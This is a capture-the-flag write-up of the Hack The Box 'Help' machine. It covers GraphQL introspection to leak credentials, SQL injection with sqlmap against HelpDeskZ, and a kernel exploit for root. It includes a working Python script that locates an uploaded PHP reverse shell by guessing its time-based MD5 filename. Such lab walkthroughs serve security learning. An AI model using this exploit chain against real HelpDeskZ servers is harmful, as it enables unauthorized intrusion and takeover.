Help - Hack The Box
Enumeration
Nmap
Initial Nmap scan revealed HTTP, SSH and Port 3000 (HTTP) was open.
WEB Enumeration
When I visited the website, it forwarded me to help.htb, so I added it to /etc/hosts file.
Then applied directory brute forcing and found an endpoint named support. There was a helpdeskz website hosted.
I applied some brute forcing to default credentials and could not find anything. Then I applied version-file brute forcing and found README.md which revealed the version of HelpDeskZ.
This version was both vulnerable to Authenticated SQL Injection and Unauthenticated File Upload to RCE. I tried RCE but it did not work.
Later, I visited the website on Port 3000, It showed a message.
I applied api-endpoints brute force and found out it was a graphql API.
Then ran basic graphql queries to understand how the website is working and what is the parameter.
Later, I captured the request with Burp Suite and ran full introspection query.
Then using the graphql-visualizer, I extracted the graphql API map.
After learning that it includes a record User which includes username and password, I simply queried it and got the password.
Then cracked the password.
Exploitation
1st Way SQL Injection
This version of HelpDeskZ was vulnerable to authenticated SQL injection. There was an exploit-db exploit but it was not working and it was old. So I red it to understand how exploit works and tested it myself.
Then I created an sqlmap command and dumped the whole database. The staff table included Administrator and its password.
Then I tried some usernames such as Administrator, admin, helpme, support, help and help worked. I logged in and got the user flag.
2nd Way Unauthenticated RCE
After some researched, I found out the RCE was not working because I was not in the same time zone as the target machine. Later I found out this repo. And updated the code as below:
import hashlib
import time, calendar
import sys
import requests
print 'HelpDesk v1.0.2 - Unauthenticated shell upload'
if len(sys.argv) < 3:
print "Usage: {} http://helpdeskz.com/support/uploads/tickets/ Reverse-shell.php".format(sys.argv[0])
sys.exit(1)
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
#Getting the Time from the server
response = requests.head('http://help.htb/support/')
serverTime = response.headers['Date']
#setting the time in Epoch
FormatTime = '%a, %d %b %Y %H:%M:%S %Z'
currentTime = int(calendar.timegm(time.strptime(serverTime, FormatTime)))
for x in range(0,20*60):
plaintext = fileName + str(currentTime -x)
md5hash = hashlib.md5(plaintext).hexdigest()
url = helpdeskzBaseUrl + md5hash + '.php'
response = requests.head(url)
if response.status_code == 200:
print("found!")
print(url)
sys.exit(0)
print("Sorry, I did not find anything")
The main update is getting the Datetime from the http://help.htb/support/ and querying from current time to previous 20 minutes. Running this script worked, and I got remote code execution.
Privilege Escalation
I tried some methods which did not work. Later, I ran linpeas and found out kernel was exploitable.
At first I tried DirtyCow but it did not work. Later, I tried CVE-2017-16995 and got the root.
Pwned
The machine was fully compromised.